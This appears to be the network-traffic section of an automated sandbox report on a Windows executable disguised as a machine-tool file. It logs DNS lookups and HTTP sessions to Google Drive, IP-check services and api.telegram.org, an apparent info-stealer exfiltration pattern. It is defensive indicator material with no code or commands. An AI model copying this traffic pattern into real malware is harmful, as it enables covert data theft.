                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.890741110 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.890749931 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.891007900 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.892538071 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.892723083 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.892757893 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.893016100 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.894743919 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.895246983 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.895256042 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.895493031 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.897219896 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.897397041 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.897406101 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.897667885 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.898992062 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.899493933 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.899502993 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.899712086 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.901104927 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.901793957 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.901802063 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.902128935 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.903083086 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.903286934 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.903350115 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.903603077 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.904993057 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.905200005 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.905208111 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.905417919 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.906928062 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.907372952 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.907381058 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.907711029 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.908854961 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.909084082 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.909090996 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.909301996 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.910975933 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.911700010 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.911708117 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.911919117 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.913131952 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.913362980 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.913371086 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.913580894 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.914501905 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.914731026 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.915503025 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.915683031 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.915689945 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.915951014 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.917773008 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.918267012 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.918273926 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.918533087 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.919106007 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.919334888 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.919342041 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.919601917 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.920887947 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.921068907 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.921077967 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.921336889 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.922719002 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.922899008 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.922905922 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.923166037 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.924418926 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.924599886 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.924633026 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.924866915 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:17.969383955 CEST44349715172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.018459082 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.163074017 CEST44349715172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.164352894 CEST49715443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.164366007 CEST44349715172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.404596090 CEST44349715172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.404683113 CEST44349715172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.404911041 CEST49715443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.405118942 CEST49715443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.407128096 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.612593889 CEST8049710132.226.247.73192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.613205910 CEST49716443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.613228083 CEST44349716172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.613440037 CEST49716443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.613636971 CEST49716443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.613647938 CEST44349716172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.658962011 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.808398008 CEST44349716172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.809650898 CEST49716443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:18.809665918 CEST44349716172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.047481060 CEST44349716172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.047564983 CEST44349716172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.047719002 CEST49716443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.048043966 CEST49716443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.057010889 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.262243032 CEST8049710132.226.247.73192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.262973070 CEST49717443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.262993097 CEST44349717172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.263202906 CEST49717443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.263452053 CEST49717443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.263463020 CEST44349717172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.315073967 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.457262039 CEST44349717172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.459062099 CEST49717443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.459074020 CEST44349717172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.699117899 CEST44349717172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.699312925 CEST44349717172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.699448109 CEST49717443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.699666977 CEST49717443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.701792955 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.907107115 CEST8049710132.226.247.73192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.907834053 CEST49718443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.907855034 CEST44349718172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.908026934 CEST49718443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.908291101 CEST49718443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.908302069 CEST44349718172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:19.955526114 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.102690935 CEST44349718172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.103929996 CEST49718443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.103941917 CEST44349718172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.346183062 CEST44349718172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.346333027 CEST44349718172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.346487045 CEST49718443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.346678972 CEST49718443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.348664045 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.554243088 CEST8049710132.226.247.73192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.554884911 CEST49719443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.554909945 CEST44349719172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.555068016 CEST49719443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.555299997 CEST49719443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.555311918 CEST44349719172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.596113920 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.749639034 CEST44349719172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.750950098 CEST49719443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.750962973 CEST44349719172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.989706039 CEST44349719172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.989798069 CEST44349719172.67.177.134192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.989964008 CEST49719443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:20.990320921 CEST49719443192.168.11.20172.67.177.134
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.122591972 CEST49720443192.168.11.20149.154.167.220
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.122617006 CEST44349720149.154.167.220192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.122876883 CEST49720443192.168.11.20149.154.167.220
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.123204947 CEST49720443192.168.11.20149.154.167.220
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.123214006 CEST44349720149.154.167.220192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.465652943 CEST44349720149.154.167.220192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.465888023 CEST49720443192.168.11.20149.154.167.220
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.467138052 CEST49720443192.168.11.20149.154.167.220
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.467144966 CEST44349720149.154.167.220192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.467370987 CEST44349720149.154.167.220192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.468532085 CEST49720443192.168.11.20149.154.167.220
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.512177944 CEST44349720149.154.167.220192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.795916080 CEST44349720149.154.167.220192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.796214104 CEST44349720149.154.167.220192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.796418905 CEST49720443192.168.11.20149.154.167.220
                                                                                                                                                                                                                        Oct 7, 2024 10:56:21.798367977 CEST49720443192.168.11.20149.154.167.220
                                                                                                                                                                                                                        Oct 7, 2024 10:57:25.553780079 CEST8049710132.226.247.73192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:57:25.554013014 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:58:00.574556112 CEST4971080192.168.11.20132.226.247.73
                                                                                                                                                                                                                        Oct 7, 2024 10:58:00.779550076 CEST8049710132.226.247.73192.168.11.20
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Oct 7, 2024 10:56:09.259800911 CEST | 192.168.11.20 | 1.1.1.1 | 0x6a9a | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false |
| Oct 7, 2024 10:56:09.923787117 CEST | 192.168.11.20 | 1.1.1.1 | 0x8bdc | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false |
| Oct 7, 2024 10:56:13.658154964 CEST | 192.168.11.20 | 1.1.1.1 | 0xe0b2 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false |
| Oct 7, 2024 10:56:14.916315079 CEST | 192.168.11.20 | 1.1.1.1 | 0x8079 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false |
| Oct 7, 2024 10:56:21.027539015 CEST | 192.168.11.20 | 1.1.1.1 | 0x2caa | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Oct 7, 2024 10:56:09.355201960 CEST | 1.1.1.1 | 192.168.11.20 | 0x6a9a | No error (0) | drive.google.com | | 142.250.80.46 | A (IP address) | IN (0x0001) | false |
| Oct 7, 2024 10:56:10.019623041 CEST | 1.1.1.1 | 192.168.11.20 | 0x8bdc | No error (0) | drive.usercontent.google.com | | 142.250.65.225 | A (IP address) | IN (0x0001) | false |
| Oct 7, 2024 10:56:13.753546000 CEST | 1.1.1.1 | 192.168.11.20 | 0xe0b2 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Oct 7, 2024 10:56:13.753546000 CEST | 1.1.1.1 | 192.168.11.20 | 0xe0b2 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false |
| Oct 7, 2024 10:56:13.753546000 CEST | 1.1.1.1 | 192.168.11.20 | 0xe0b2 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false |
| Oct 7, 2024 10:56:13.753546000 CEST | 1.1.1.1 | 192.168.11.20 | 0xe0b2 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false |
| Oct 7, 2024 10:56:13.753546000 CEST | 1.1.1.1 | 192.168.11.20 | 0xe0b2 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false |
| Oct 7, 2024 10:56:13.753546000 CEST | 1.1.1.1 | 192.168.11.20 | 0xe0b2 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false |
| Oct 7, 2024 10:56:15.018403053 CEST | 1.1.1.1 | 192.168.11.20 | 0x8079 | No error (0) | reallyfreegeoip.org | | 172.67.177.134 | A (IP address) | IN (0x0001) | false |
| Oct 7, 2024 10:56:15.018403053 CEST | 1.1.1.1 | 192.168.11.20 | 0x8079 | No error (0) | reallyfreegeoip.org | | 104.21.67.152 | A (IP address) | IN (0x0001) | false |
| Oct 7, 2024 10:56:21.121890068 CEST | 1.1.1.1 | 192.168.11.20 | 0x2caa | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false |
                                                                                                                                                                                                                        • drive.google.com
                                                                                                                                                                                                                        • drive.usercontent.google.com
                                                                                                                                                                                                                        • reallyfreegeoip.org
                                                                                                                                                                                                                        • api.telegram.org
                                                                                                                                                                                                                        • checkip.dyndns.org
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.11.20 | 49710 | 132.226.247.73 | 80 | 800 | C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe |
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 10:56:13.962987900 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                                                                                        Connection: Keep-Alive
Oct 7, 2024 10:56:14.168529034 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:14 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 106
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Request-ID: 2f545c233f7eeef3d4efa937d0811288
                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.187</body></html>
Oct 7, 2024 10:56:14.172167063 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                        Host: checkip.dyndns.org
Oct 7, 2024 10:56:14.377677917 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:14 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 106
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Request-ID: b2c3dfc312dcdb17e0c6fa64352b87a9
                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.187</body></html>
Oct 7, 2024 10:56:15.831007004 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                        Host: checkip.dyndns.org
Oct 7, 2024 10:56:16.036747932 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:15 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 106
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Request-ID: 9015fbcb10c6c40f2a58dcb6fea636d4
                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.187</body></html>
Oct 7, 2024 10:56:16.473608017 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                        Host: checkip.dyndns.org
Oct 7, 2024 10:56:16.679282904 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:16 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 106
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Request-ID: c016c2b5da95cf21c26d47ba60012b40
                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.187</body></html>
Oct 7, 2024 10:56:17.121479988 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                        Host: checkip.dyndns.org
Oct 7, 2024 10:56:17.326919079 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:17 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 106
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Request-ID: 29dacb5bdc775c9df0a4d95363864340
                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.187</body></html>
Oct 7, 2024 10:56:17.763058901 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                        Host: checkip.dyndns.org
Oct 7, 2024 10:56:17.968271971 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:17 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 106
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Request-ID: 20819ee7e268254f94f5b21e69d3f92b
                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.187</body></html>
Oct 7, 2024 10:56:18.407128096 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                        Host: checkip.dyndns.org
Oct 7, 2024 10:56:18.612593889 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:18 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 106
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Request-ID: 5758bacdf9ba2f0546ad39a420e74c1f
                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.187</body></html>
Oct 7, 2024 10:56:19.057010889 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                        Host: checkip.dyndns.org
Oct 7, 2024 10:56:19.262243032 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:19 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 106
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Request-ID: 2c607c59f5f9fd211ee9d561dc651b33
                                                                                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.187</body></html>
Oct 7, 2024 10:56:19.701792955 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                        Host: checkip.dyndns.org
Oct 7, 2024 10:56:19.907107115 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Mon, 07 Oct 2024 08:56:19 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 106
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        X-Request-ID: 343b62c7efc39a4ee6c4ce67969830bf
